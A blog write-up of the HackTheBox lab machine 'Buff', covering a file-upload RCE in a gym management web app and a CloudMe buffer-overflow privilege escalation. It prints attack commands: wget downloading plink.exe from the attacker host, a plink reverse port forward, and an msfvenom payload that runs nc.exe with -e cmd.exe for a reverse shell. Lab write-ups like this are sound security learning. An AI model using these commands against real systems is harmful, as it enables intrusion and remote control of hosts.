Hey there! This is Shreya and today I am gonna show you how to pwn buff from hackthebox. Buff is an easy level windows machine having a straightforward way to obtain initial foothold. Privilege escalation to Administrator requires to abuse a service that has its exploit available on exploit-db, still its tricky to get through.
With that being said, let’s get started.
Starting with nmap scan, I found only one open port.
# nmap -sC -sV -oA buff.nmap 10.10.10.198 Nmap scan report for 10.10.10.198 Host is up (0.53s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 |_http-title: mrb3n's Bro Hut Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done at Sun Jul 26 11:45:15 2020 -- 1 IP address (1 host up) scanned in 83.46 seconds
Going up there on http://10.10.10.198:8080 , A page landed
The application had a lots of clickable links. I thought it would be sql injection but it wasn’t. But I saw something in the application’s footer.
I googled for term About Fitness projectworld.in and got the one that I was really interested in. It was gym management system having the same functionalities/UI/UX that we had in our vulnerable box.
Next, I searched the google if I could find any exploits for this project and you guess it right. I found one on exploit-db
I copied the exploit to my kali machine and ran the exploit.
# python exploit.py http://10.10.10.198:8080/
And I got the shell, but it was not good enough. So I read the specifics of exploit to find out what exactly is happening. Here, the upload directory didnt had any authorization check and anybody could access it. Also, there was a file upload vulnerability that can lead to RCE by crafting a malicious php payload that bypasses all the file upload filters.
The exploit is uploading a malicious payload in kamehameha.php under /upload having the get parameter as telepathy.
Run the following url and open up a netcat listener on the port specified in the nc.exe command ( nc.exe is already present in the current directory thats accessible.)
And we got the user directly! Awesome!! Lets grab the user.txt
I fired up winPEAS.exe and the terminal was flowing with results! It was really difficult to find stuff that could really lead to privilege escalation.
After a bit of searching manual searching in directories, I found that cloudme_1112.exe was present inside C:\Users\shaun\Downloads. It seemed to be an interesting file.
I googled for cloudme_1112 exploit and luckily found one here!!!
The exploit says run the service followed by executing the script. The payload corresponding to your port and ip has to be generated via msfvenom.
The service is listening on 127.0.0.1:8888, as can be seen when netstat -ano is executed.
The exploit is written in python, but unfortunately we dont have python present on the box. So there are 2 ways in which we can run our exploit
- Convert the python exploit into the .exe that can be exeuted directly on the vulnerable windows machine.
- Open a reverse connection using plink that forwards remote port over the local address.
I’ll be showing you the second method.
Very first, we need to download the plink.exe. It can be found here.
Upload plink.exe to windows machine.
PS> wget http://10.10.14.37/plink.exe -o plink.exe
Now run the following command on windows to forward 127.0.0.1:8888 (where the service is running) to 127.0.0.1:8888 (on the attacker machine)
PS> plink.exe -l root -pw toor 10.10.14.32 -R 8888:127.0.0.1:8888
Now run netstat on attacker machine to see if 127.0.0.1:8888 is listening
Yes it is!! and that’s great. Next up, the payload has to be created using msfvenom to get a reverse shell.
On attacking machine, execute the following
# msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.37 4444 -e cmd.exe' -b '\x00\x0a\x0d' -f py -v payload
This will generate a payload that needs to be replaced with the one that is already present in the exploit script.
Now open up a nc listener on port 4444 ( as it is specified in the msfvenom payload) and simply execute the python script ( do it atleast 3-4 times until you get a shell).
This will execute as if we the executing the script on the windows box and we get a reverse shell on the listener.
The administrator is now owned!!! Go grab the root.txt
That’s all from the blog post! Thanks for reading.
See you in the next one. Until then, happy hunting!!!